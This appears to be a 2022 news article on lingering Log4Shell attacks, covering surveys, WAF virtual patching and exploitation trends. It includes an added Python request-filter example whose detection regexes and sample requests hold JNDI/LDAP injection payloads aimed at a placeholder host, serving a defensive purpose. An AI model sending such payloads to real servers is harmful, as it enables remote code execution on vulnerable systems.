Log4j Vulnerability Remains Headache for Cybersecurity Pros, Likely Exploited in Ukraine Attacks

  • Written by Edward Gately
  • March 2, 2022
The risk of having the vulnerability exploited is much higher under the circumstances.

A new Neustar International Security Council (NISC) survey shows the Log4j vulnerability continues to plague security professionals globally. Moreover, threat actors could exploit Log4j in attacks against Ukraine.

Three out of five organizations have fielded Log4j attacks. Log4Shell is a zero-day vulnerability in the popular Java logging library Log4j. It allows remote code execution (RCE) when the library logs a specially crafted string.

Researchers discovered the Log4j vulnerability in early December. It led to an explosion of attacks.

Carlos Morales is senior vice president of solutions at Neustar Security Services.

“In general, there is ample evidence of increased cyber activity towards Ukraine-based companies,” he said. “So it is of great importance for those companies to ensure they are preventing access to any known vulnerabilities like Log4j that could be exploited. The risk of having the vulnerability exploited is much higher under the circumstances.”

Personally Impacted by Log4j Vulnerability

Among the NISC survey findings:

  • Log4j has personally impacted three-quarters of respondents. In addition, one in five said the impact had been significant.
  • Nearly half said Log4j has made them reevaluate software supply chain security practices and purchasing decisions.
  • A substantial majority said regulatory bodies like the Federal Trade Commission (FTC) should take legal action against organizations that fail to patch for Log4j.

For companies that have deployed web application firewall (WAF) technology or contract WAF functions from their cloud security providers, there may be a simple solution for handling zero-day threats like Log4j. That’s virtual patching.

Virtual patching tricks any potential attackers into thinking that applications aren’t vulnerable to a threat, Morales said.

“The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server, bridging data between the two,” he said. “Since it is terminating the client traffic, the WAF can act on behalf of the origin server and cover up for any vulnerabilities that exist on the server.”
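The inspect-then-forward behavior Morales describes can be sketched as follows. This is an added example, not code from the article, Neustar or any WAF product; the function names and sample requests are hypothetical, and the rule assumes the well-known `${jndi:` lookup syntax that triggers Log4Shell.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: depth of nested percent-encoding to unwrap
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{")  # conservative: no lookup syntax from clients

def normalize(value):
    """Percent-decode repeatedly so encoded input is inspected in clear form."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(path, headers, body=""):
    """Return (allowed, reason). Every client-controlled field is checked,
    since any of them may reach a log statement on the origin server."""
    fields = [("path", path), ("body", body)]
    fields += [("header:" + name, val) for name, val in headers.items()]
    for name, raw in fields:
        value = normalize(raw)
        if JNDI_LOOKUP.search(value):
            return False, "JNDI lookup in " + name
        if ANY_LOOKUP.search(value):
            return False, "lookup expression in " + name
    return True, "clean"

def proxy(path, headers, body, forward):
    """Terminate the client request; only clean requests reach the origin."""
    allowed, reason = inspect_request(path, headers, body)
    if not allowed:
        return 403, reason  # the origin never sees this request
    return forward(path, headers, body)

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("/index.html", {"User-Agent": "Mozilla/5.0"}, ""),
    ("/login", {"User-Agent": "${jndi:ldap://example.invalid/a}"}, ""),
    ("/search?q=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.invalid%257D", {}, ""),
    ("/api", {"X-Api-Version": "${date:yyyy}"}, ""),
]

if __name__ == "__main__":
    for path, headers, body in SAMPLES:
        print(path, inspect_request(path, headers, body))
```

Rejecting every `${` sequence is deliberately strict and can block legitimate input, so a rule like this is a stopgap in front of servers that still need the library upgrade.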

Still At It 2 Months Later

Hackers pounced on Log4Shell vulnerabilities in December, and they are still at it two months later, according to new Barracuda research.

Since Dec. 10, Barracuda researchers have analyzed the Log4j software attacks and payloads detected by its systems. The volume of attacks attempting to exploit these vulnerabilities has remained relatively constant with a few dips and spikes over the past two months.

Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, Barracuda researchers expect this attack pattern to continue, at least in the short term.

Among Barracuda research findings:

  • The majority of attacks came from IP addresses in the United States. Half of those IP addresses are associated with Amazon Web Services (AWS), Azure and other data centers.
  • Threat actors are sending attacks from Japan, Germany, the Netherlands and Russia.

Tushar Richabadas is Barracuda’s senior product manager of application and cloud security. He said cybercriminals likely have had some success with Log4Shell.

“We’re seeing a lot of scans, and a lot of attacks, but not many high-profile breaches,” he said. “A large portion of the exploit attempts are cryptominers. There were also distributed denial-of-service (DDoS) bots like Mirai and such. We’re slowly hearing about more significant attackers like the … Conti group using this vulnerability. So we’ll likely see bigger breaches happening over time.”

Long Tail for Log4j Attacks

There is probably going to be a long tail for these attacks and scams, Richabadas said. Therefore, patching is going to remain critical for a very long time.

ProxyLogon vulnerabilities were discovered in March of last year. However, Barracuda saw renewed interest from malware groups in November, he said.

“We’ll probably see something similar with Log4Shell as well,” Richabadas said. “A large number of organizations have patched or upgraded their vulnerable installations, and have also added layers of protection against such attacks. This is something that has stopped a large number of these attacks. In terms of stopping the threat actors themselves, the most effective has been the takedowns of the payload servers and callback servers.”
